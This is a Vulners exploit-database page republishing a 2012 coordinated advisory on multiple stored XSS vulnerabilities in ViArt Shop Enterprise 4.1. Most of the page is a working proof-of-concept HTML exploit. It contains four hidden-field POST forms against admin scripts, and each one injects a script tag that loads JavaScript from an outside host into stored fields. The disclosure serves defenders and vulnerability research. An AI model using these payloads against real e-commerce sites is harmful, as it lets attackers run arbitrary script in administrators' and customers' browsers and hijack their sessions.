Vulners
Lucene search
ViArt Shop Enterprise 4.1 (post-auth) Multiple Stored XSS Vulnerabilities
🗓️ 25 Sep 2012 00:00:00Reported by Gjoko KrsticExploit coded by teppeiType 
zeroscience🔗 www.zeroscience.mk👁 21 Views
<!--
ViArt Shop Enterprise 4.1 (post-auth) Multiple Stored XSS Vulnerabilities
Vendor: ViArt Software
Product web page: http://www.viart.com
Affected version: 4.1, 4.0.8 and 4.0.5
Summary: Viart Shop is a PHP based e-commerce suite, aiming to provide everything
you need to run a successful on-line business.
Desc: ViArt Shop suffers from multiple stored cross-site scripting vulnerabilities.
The issues are triggered when input passed via several parameters to several scripts
is not properly sanitized before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in context of an
affected site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Exploit coded by teppei ([email protected])
Vendor status:
[09.09.2012] Vulnerabilities discovered.
[24.09.2012] Contact with the vendor.
[24.09.2012] Vendor responds asking more details.
[24.09.2012] Sent detailed information to the vendor.
[25.09.2012] Vendor confirms the issues, releasing fix (http://www.viart.com/downloads/viart_shop-4.1.zip).
[25.09.2012] Coordinated public security advisory released.
Advisory ID: ZSL-2012-5108
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5108.php
09.09.2012
--><html>
<head>
<title>ViArt Shop Enterprise 4.1 (post-auth) Multiple Stored XSS Vulnerabilities</title>
</head>
<body><center><br/>
<form action="http://localhost/viart/admin/admin_item_type.php" method="post">
<input name="affiliate_commission_amount" type="hidden" value="2"/>
<input name="affiliate_commission_type" type="hidden" value=""/>
<input name="credit_reward_amount" type="hidden" value=""/>
<input name="credit_reward_type" type="hidden" value=""/>
<input name="google_base_type_id" type="hidden" value="-1"/>
<input name="item_type_id" type="hidden" value=""/>
<input name="item_type_name" type="hidden" value='"><script src="http://zeroscience.mk/codes/dae.js"></script>'/>
<input name="merchant_fee_amount" type="hidden" value="1"/>
<input name="merchant_fee_type" type="hidden" value="0"/>
<input name="operation" type="hidden" value="save"/>
<input name="reward_amount" type="hidden" value=""/>
<input name="reward_type" type="hidden" value=""/>
<input type="submit" value="Xploit #1"/>
</form>
<br/>
<form action="http://localhost/viart/admin/admin_supplier.php" method="post">
<input name="full_description" type="hidden" value="1"/>
<input name="operation" type="hidden" value="save"/>
<input name="short_description" type="hidden" value="ZSL"/>
<input name="supplier_email" type="hidden" value="[email protected]"/>
<input name="supplier_id" type="hidden" value=""/>
<input name="supplier_name" type="hidden" value='"><script src="http://zeroscience.mk/codes/dae.js"></script>'/>
<input name="supplier_order" type="hidden" value="1"/>
<input type="submit" value="Xploit #2"/>
</form>
<br/>
<form action="http://localhost/viart/admin/admin_saved_type.php" method="post">
<input name="allowed_search" type="hidden" value="1"/>
<input name="is_active" type="hidden" value="1"/>
<input name="operation" type="hidden" value="save"/>
<input name="type_desc" type="hidden" value="thricer"/>
<input name="type_id" type="hidden" value=""/>
<input name="type_name" type="hidden" value='"><script src="http://zeroscience.mk/codes/dae.js"></script>'/>
<input type="submit" value="Xploit #3"/>
</form>
<br/>
<form action="http://localhost/viart/admin/admin_forum_topic.php" method="post">
<input name="attachments_url" type="hidden" value="admin_forum_attachments.php"/>
<input name="description" type="hidden" value="sm"/>
<input name="forum_id" type="hidden" value="1"/>
<input name="friendly_url" type="hidden" value="Ecchi"/>
<input name="operation" type="hidden" value="save"/>
<input name="priority_id" type="hidden" value="1"/>
<input name="remote_address" type="hidden" value='"><script src="http://zeroscience.mk/codes/dae.js"></script>'/>
<input name="rp" type="hidden" value="admin_forum_thread.php?thread_id="/>
<input name="thread_id" type="hidden" value=""/>
<input name="topic" type="hidden" value='"><script src="http://zeroscience.mk/codes/dae.js"></script>'/>
<input name="user_email" type="hidden" value="[email protected]"/>
<input name="user_id" type="hidden" value="2"/>
<input name="user_name" type="hidden" value="apo"/>
<input name="views" type="hidden" value="2"/>
<input type="submit" value="Xploit #4"/>
</form>
</center>
</body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Sep 2012 00:00Current
6Medium risk
Vulners AI Score6